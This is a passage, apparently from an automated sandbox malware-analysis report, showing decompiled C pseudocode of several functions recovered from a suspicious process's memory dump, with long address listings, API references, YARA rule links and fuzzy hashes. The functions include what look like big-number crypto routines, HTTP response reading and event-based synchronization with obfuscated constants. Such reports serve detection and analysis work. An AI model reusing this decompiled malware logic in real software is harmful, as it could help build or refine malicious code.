												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                                                                                          0x04975925
                                                                                                                          0x0497592e
                                                                                                                          0x0497592f
                                                                                                                          0x04975933
                                                                                                                          0x04975939
                                                                                                                          0x0497593f
                                                                                                                          0x04975948
                                                                                                                          0x0497594e
                                                                                                                          0x04975958
                                                                                                                          0x0497595a
                                                                                                                          0x04975960
                                                                                                                          0x04975965
                                                                                                                          0x04975970
                                                                                                                          0x04975976
                                                                                                                          0x0497597b
                                                                                                                          0x04975a9d
                                                                                                                          0x04975981
                                                                                                                          0x04975981
                                                                                                                          0x0497598e
                                                                                                                          0x04975994
                                                                                                                          0x0497599a
                                                                                                                          0x0497599e
                                                                                                                          0x049759a4
                                                                                                                          0x049759b1
                                                                                                                          0x049759b5
                                                                                                                          0x049759bb
                                                                                                                          0x049759be
                                                                                                                          0x049759c6
                                                                                                                          0x049759c7
                                                                                                                          0x049759cb
                                                                                                                          0x049759cf
                                                                                                                          0x049759d2
                                                                                                                          0x049759d5
                                                                                                                          0x049759db
                                                                                                                          0x049759e4
                                                                                                                          0x049759ea
                                                                                                                          0x049759eb
                                                                                                                          0x049759ee
                                                                                                                          0x049759ef
                                                                                                                          0x049759f0
                                                                                                                          0x049759f8
                                                                                                                          0x049759f9
                                                                                                                          0x049759fa
                                                                                                                          0x049759fc
                                                                                                                          0x04975a00
                                                                                                                          0x04975a04
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04975a0a
                                                                                                                          0x04975a13
                                                                                                                          0x04975a19
                                                                                                                          0x04975a23
                                                                                                                          0x04975a27
                                                                                                                          0x04975a29
                                                                                                                          0x04975a36
                                                                                                                          0x04975a3a
                                                                                                                          0x04975a42
                                                                                                                          0x04975a47
                                                                                                                          0x04975a59
                                                                                                                          0x04975a5b
                                                                                                                          0x04975a61
                                                                                                                          0x04975a61
                                                                                                                          0x04975a6a
                                                                                                                          0x04975a6a
                                                                                                                          0x04975a6c
                                                                                                                          0x04975a72
                                                                                                                          0x04975a72
                                                                                                                          0x04975a75
                                                                                                                          0x04975a7b
                                                                                                                          0x04975a7e
                                                                                                                          0x04975a87
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04975a87
                                                                                                                          0x049759db
                                                                                                                          0x049759d5
                                                                                                                          0x049759be
                                                                                                                          0x04975a8d
                                                                                                                          0x04975a8d
                                                                                                                          0x04975a93
                                                                                                                          0x04975a93
                                                                                                                          0x04975a99
                                                                                                                          0x04975a99
                                                                                                                          0x04975aa2
                                                                                                                          0x04975aa8
                                                                                                                          0x04975aa8
                                                                                                                          0x04975965
                                                                                                                          0x04975ab1

                                                                                                                          APIs
                                                                                                                          • SysAllocString.OLEAUT32(0497C2B0), ref: 04975970
                                                                                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04975A51
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04975A6A
                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 04975A99
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: String$Free$Alloclstrcmp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1885612795-0
                                                                                                                          • Opcode ID: aa558398361aa8e31c402671e88b515309c74cbf305c03b98636f7cd3b2fe3e0
                                                                                                                          • Instruction ID: 1b81837d8854610549a136db8765aa8ee1c524587dfec7eeac6824575c156ae9
                                                                                                                          • Opcode Fuzzy Hash: aa558398361aa8e31c402671e88b515309c74cbf305c03b98636f7cd3b2fe3e0
                                                                                                                          • Instruction Fuzzy Hash: AF515D75D00519EFCF05DFA8C8888AEB7B9FFC8710B1585A8E915EB210D731AD42CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04977B30, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 85%
                                                                                                                          			E04977B30(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E049747C4(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E0497227C(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04973C06(_t101,  &_v428, _a8, _t96 - _t81);
					E04973C06(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E0497227C(_t101, 0x497d168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E0497227C(_a16, _a4);
						E04973450(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0497AED0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L0497AECA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E04972420(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E04973F60(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04972775(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x497d168 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                                                                                          0x04977b33
                                                                                                                          0x04977b3f
                                                                                                                          0x04977b45
                                                                                                                          0x04977b4a
                                                                                                                          0x04977b4e
                                                                                                                          0x04977cc0
                                                                                                                          0x04977cc4
                                                                                                                          0x04977cc4
                                                                                                                          0x04977b54
                                                                                                                          0x04977b58
                                                                                                                          0x04977b5c
                                                                                                                          0x04977b5f
                                                                                                                          0x04977b6a
                                                                                                                          0x04977b70
                                                                                                                          0x04977b75
                                                                                                                          0x04977b78
                                                                                                                          0x04977b92
                                                                                                                          0x04977ba1
                                                                                                                          0x04977bad
                                                                                                                          0x04977bb7
                                                                                                                          0x04977bbc
                                                                                                                          0x04977bbe
                                                                                                                          0x04977bc1
                                                                                                                          0x04977c78
                                                                                                                          0x04977c7e
                                                                                                                          0x04977c8f
                                                                                                                          0x04977ca2
                                                                                                                          0x04977cb8
                                                                                                                          0x00000000
                                                                                                                          0x04977cbd
                                                                                                                          0x04977bca
                                                                                                                          0x04977bd1
                                                                                                                          0x04977bd5
                                                                                                                          0x04977bdb
                                                                                                                          0x04977bdd
                                                                                                                          0x04977bdf
                                                                                                                          0x04977be1
                                                                                                                          0x04977be3
                                                                                                                          0x04977bed
                                                                                                                          0x04977bf2
                                                                                                                          0x04977bf4
                                                                                                                          0x04977bf6
                                                                                                                          0x04977bf7
                                                                                                                          0x04977bf8
                                                                                                                          0x04977bf9
                                                                                                                          0x04977c00
                                                                                                                          0x04977c07
                                                                                                                          0x04977c0a
                                                                                                                          0x04977c0a
                                                                                                                          0x04977bd7
                                                                                                                          0x04977bd7
                                                                                                                          0x04977bd7
                                                                                                                          0x04977c12
                                                                                                                          0x04977c1a
                                                                                                                          0x04977c26
                                                                                                                          0x04977c2b
                                                                                                                          0x04977c2b
                                                                                                                          0x04977c30
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04977c32
                                                                                                                          0x04977c35
                                                                                                                          0x04977c42
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04977c44
                                                                                                                          0x04977c44
                                                                                                                          0x04977c51
                                                                                                                          0x04977c2b
                                                                                                                          0x04977c30
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04977c30
                                                                                                                          0x04977c5b
                                                                                                                          0x04977c5e
                                                                                                                          0x04977c61
                                                                                                                          0x04977c68
                                                                                                                          0x04977c68
                                                                                                                          0x04977c75
                                                                                                                          0x00000000
                                                                                                                          0x04977c75
                                                                                                                          0x04977b61
                                                                                                                          0x04977b65
                                                                                                                          0x04977b66
                                                                                                                          0x04977b68
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04977b68
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04977BE3
                                                                                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04977BF9
                                                                                                                          • memset.NTDLL ref: 04977CA2
                                                                                                                          • memset.NTDLL ref: 04977CB8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_allmul_aulldiv
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3041852380-0
                                                                                                                          • Opcode ID: a666261e5480f766eed9f30efe7e59dd910b27e8206c3589e7e84efeddc6b7a4
                                                                                                                          • Instruction ID: a90a943d5ef0d62990b010677dcef94601a3c920f1593f112b697e8081d7ed89
                                                                                                                          • Opcode Fuzzy Hash: a666261e5480f766eed9f30efe7e59dd910b27e8206c3589e7e84efeddc6b7a4
                                                                                                                          • Instruction Fuzzy Hash: 16418231A00219BFEF109FA8CC44BDE7B79EF89314F1445B9E90597280EB70BA54CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04974F07, Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 57%
                                                                                                                          			E04974F07(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0x497d130() != 0) {
								_v8 = 8;
							} else {
								_t47 = E049775F6(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x497d2a4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E04974AAB(_v20);
											if(_v8 == 0) {
												_v8 = E04973B3F(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E0497121A(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

























                                                                                                                          0x04974f08
                                                                                                                          0x04974f0e
                                                                                                                          0x04974f19
                                                                                                                          0x04974f19
                                                                                                                          0x04974f1b
                                                                                                                          0x04977613
                                                                                                                          0x04977616
                                                                                                                          0x0497761f
                                                                                                                          0x04977622
                                                                                                                          0x04977625
                                                                                                                          0x0497762d
                                                                                                                          0x0497772b
                                                                                                                          0x04977731
                                                                                                                          0x04977739
                                                                                                                          0x0497773b
                                                                                                                          0x00000000
                                                                                                                          0x0497773b
                                                                                                                          0x04977633
                                                                                                                          0x04977636
                                                                                                                          0x0497773e
                                                                                                                          0x0497773e
                                                                                                                          0x0497763c
                                                                                                                          0x0497763f
                                                                                                                          0x04977640
                                                                                                                          0x04977642
                                                                                                                          0x0497764b
                                                                                                                          0x04977722
                                                                                                                          0x04977651
                                                                                                                          0x04977657
                                                                                                                          0x0497765c
                                                                                                                          0x04977661
                                                                                                                          0x04977710
                                                                                                                          0x04977667
                                                                                                                          0x00000000
                                                                                                                          0x04977667
                                                                                                                          0x04977667
                                                                                                                          0x04977667
                                                                                                                          0x04977667
                                                                                                                          0x0497766c
                                                                                                                          0x0497766e
                                                                                                                          0x0497766e
                                                                                                                          0x0497767b
                                                                                                                          0x04977683
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04977685
                                                                                                                          0x04977692
                                                                                                                          0x04977698
                                                                                                                          0x04977698
                                                                                                                          0x0497769b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0497769d
                                                                                                                          0x049776a8
                                                                                                                          0x049776bc
                                                                                                                          0x049776f2
                                                                                                                          0x049776be
                                                                                                                          0x049776be
                                                                                                                          0x049776c5
                                                                                                                          0x049776cd
                                                                                                                          0x00000000
                                                                                                                          0x049776cf
                                                                                                                          0x049776cf
                                                                                                                          0x049776d5
                                                                                                                          0x049776dd
                                                                                                                          0x049776e4
                                                                                                                          0x00000000
                                                                                                                          0x049776e4
                                                                                                                          0x049776dd
                                                                                                                          0x049776cd
                                                                                                                          0x049776f5
                                                                                                                          0x049776f8
                                                                                                                          0x04977700
                                                                                                                          0x0497770b
                                                                                                                          0x0497770b
                                                                                                                          0x00000000
                                                                                                                          0x04977700
                                                                                                                          0x049776a5
                                                                                                                          0x00000000
                                                                                                                          0x049776e7
                                                                                                                          0x049776e7
                                                                                                                          0x00000000
                                                                                                                          0x049776f0
                                                                                                                          0x04977717
                                                                                                                          0x04977717
                                                                                                                          0x0497771d
                                                                                                                          0x0497771d
                                                                                                                          0x0497764b
                                                                                                                          0x04977636
                                                                                                                          0x04977748
                                                                                                                          0x04974f10
                                                                                                                          0x04974f10
                                                                                                                          0x04974f17
                                                                                                                          0x04974f22
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04974f17

                                                                                                                          APIs
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 049776AF
                                                                                                                          • GetLastError.KERNEL32 ref: 049776CF
                                                                                                                            • Part of subcall function 0497121A: wcstombs.NTDLL ref: 049712DC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastObjectSingleWaitwcstombs
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2344289193-0
                                                                                                                          • Opcode ID: dc76a99dd1a0574b3761ff746330fb76afddf3890d00715b872025e8129e3036
                                                                                                                          • Instruction ID: f5f4aff9e8e068424d763f3d0b45b837315b64f1d1854502069b218f5f3d6abb
                                                                                                                          • Opcode Fuzzy Hash: dc76a99dd1a0574b3761ff746330fb76afddf3890d00715b872025e8129e3036
                                                                                                                          • Instruction Fuzzy Hash: 2B41E975A00219EFDF10AFE8D984AAEBBB9FB44345F2048B9E502E6141E734BE40DB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04973DA0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SysAllocString.OLEAUT32(80000002), ref: 04973DFD
                                                                                                                          • SysAllocString.OLEAUT32(049728D9), ref: 04973E41
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04973E55
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04973E63
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: String$AllocFree
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 344208780-0
                                                                                                                          • Opcode ID: 8d6fcbeb095276a12107edb4946fee57f56cfca37b829a3cc13c1fcc6f32aab1
                                                                                                                          • Instruction ID: 314f3bec420046f4f9634843ca107bb08977df7f82ce0750342948bd507bab34
                                                                                                                          • Opcode Fuzzy Hash: 8d6fcbeb095276a12107edb4946fee57f56cfca37b829a3cc13c1fcc6f32aab1
                                                                                                                          • Instruction Fuzzy Hash: A3311076900209EFCB15DF98D8C48AE7BB9FF48340B10847EF90597250D775AA41DFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04977CC7, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 87%
                                                                                                                          			E04977CC7(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x497d2a8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x497d2e0; // 0x267a5a8
				_t3 = _t8 + 0x497e876; // 0x61636f4c
				_t25 = 0;
				_t30 = E04973CC2(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x497d2e4, 1, 0, _t30);
					E04974AAB(_t30);
				}
				_t12 =  *0x497d294; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04974A03() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E04971000(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x497d108( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E04975AB2(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                                                                                                          0x04977cc8
                                                                                                                          0x04977ccf
                                                                                                                          0x04977cd9
                                                                                                                          0x04977cdd
                                                                                                                          0x04977ce3
                                                                                                                          0x04977cf2
                                                                                                                          0x04977cf9
                                                                                                                          0x04977cfd
                                                                                                                          0x04977d0f
                                                                                                                          0x04977d11
                                                                                                                          0x04977d11
                                                                                                                          0x04977d16
                                                                                                                          0x04977d1d
                                                                                                                          0x04977d74
                                                                                                                          0x04977d74
                                                                                                                          0x04977d7a
                                                                                                                          0x04977d7c
                                                                                                                          0x04977d7c
                                                                                                                          0x04977d86
                                                                                                                          0x04977d8a
                                                                                                                          0x04977d9c
                                                                                                                          0x04977d9c
                                                                                                                          0x04977da0
                                                                                                                          0x04977da6
                                                                                                                          0x04977da6
                                                                                                                          0x00000000
                                                                                                                          0x04977d36
                                                                                                                          0x04977d3b
                                                                                                                          0x04977d43
                                                                                                                          0x04977d47
                                                                                                                          0x04977d4b
                                                                                                                          0x04977d4b
                                                                                                                          0x04977d58
                                                                                                                          0x04977d5c
                                                                                                                          0x04977d60
                                                                                                                          0x04977db5
                                                                                                                          0x04977dbb
                                                                                                                          0x04977dbb
                                                                                                                          0x04977d6e
                                                                                                                          0x04977d72
                                                                                                                          0x04977da9
                                                                                                                          0x04977dab
                                                                                                                          0x04977dae
                                                                                                                          0x04977dae
                                                                                                                          0x00000000
                                                                                                                          0x04977dab
                                                                                                                          0x04977d72
                                                                                                                          0x00000000
                                                                                                                          0x04977d5c

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04973CC2: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,06FF9B38,00000000,?,?,69B25F44,00000005,0497D00C,?,?,0497539B), ref: 04973CF8
                                                                                                                            • Part of subcall function 04973CC2: lstrcpy.KERNEL32(00000000,00000000), ref: 04973D1C
                                                                                                                            • Part of subcall function 04973CC2: lstrcat.KERNEL32(00000000,00000000), ref: 04973D24
                                                                                                                          • CreateEventA.KERNEL32(0497D2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,049721B6,?,00000001,?), ref: 04977D08
                                                                                                                            • Part of subcall function 04974AAB: HeapFree.KERNEL32(00000000,00000000,04975012,00000000,?,?,00000000), ref: 04974AB7
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,049721B6,00000000,00000000,?,00000000,?,049721B6,?,00000001,?,?,?,?,0497555B), ref: 04977D68
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,049721B6,?,00000001,?), ref: 04977D96
                                                                                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,049721B6,?,00000001,?,?,?,?,0497555B), ref: 04977DAE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 73268831-0
                                                                                                                          • Opcode ID: 1783f67a94a30b8d29f62cf2a9764c838dcb3d476a94786ca67890d8b0fc3eb5
                                                                                                                          • Instruction ID: 499ff92735f56521c57fb0790140ca2833608566d4eea94e5466e2474411447b
                                                                                                                          • Opcode Fuzzy Hash: 1783f67a94a30b8d29f62cf2a9764c838dcb3d476a94786ca67890d8b0fc3eb5
                                                                                                                          • Instruction Fuzzy Hash: 6421E4326047126BD7315EE89C48A7B769DFFC8B14B0547B6F945EB100DA24FC018794
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04972107, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 40%
                                                                                                                          			E04972107(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04973946(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E049765EA(_t23);
						}
					}
					return _t38;
				}
				if(E049737AC(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x497d2e4, 1, 0,  *0x497d384);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E049724BE(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E0497282B(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E049751BB(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04977CC7( &_v32, _t39);
					goto L13;
				}
			}












                                                                                                                          0x04972107
                                                                                                                          0x04972114
                                                                                                                          0x0497211a
                                                                                                                          0x0497211b
                                                                                                                          0x0497211c
                                                                                                                          0x0497211d
                                                                                                                          0x0497211e
                                                                                                                          0x04972122
                                                                                                                          0x0497212e
                                                                                                                          0x04972132
                                                                                                                          0x049721ba
                                                                                                                          0x049721ba
                                                                                                                          0x049721bd
                                                                                                                          0x049721bf
                                                                                                                          0x049721c7
                                                                                                                          0x049721c7
                                                                                                                          0x049721cd
                                                                                                                          0x049721d0
                                                                                                                          0x049721d0
                                                                                                                          0x049721cd
                                                                                                                          0x049721db
                                                                                                                          0x049721db
                                                                                                                          0x04972145
                                                                                                                          0x04972147
                                                                                                                          0x04972147
                                                                                                                          0x0497215e
                                                                                                                          0x04972162
                                                                                                                          0x04972165
                                                                                                                          0x04972170
                                                                                                                          0x04972177
                                                                                                                          0x04972177
                                                                                                                          0x04972180
                                                                                                                          0x04972184
                                                                                                                          0x04972192
                                                                                                                          0x04972186
                                                                                                                          0x04972186
                                                                                                                          0x04972187
                                                                                                                          0x04972188
                                                                                                                          0x04972189
                                                                                                                          0x0497218a
                                                                                                                          0x0497218b
                                                                                                                          0x0497218b
                                                                                                                          0x04972197
                                                                                                                          0x0497219a
                                                                                                                          0x0497219e
                                                                                                                          0x049721a0
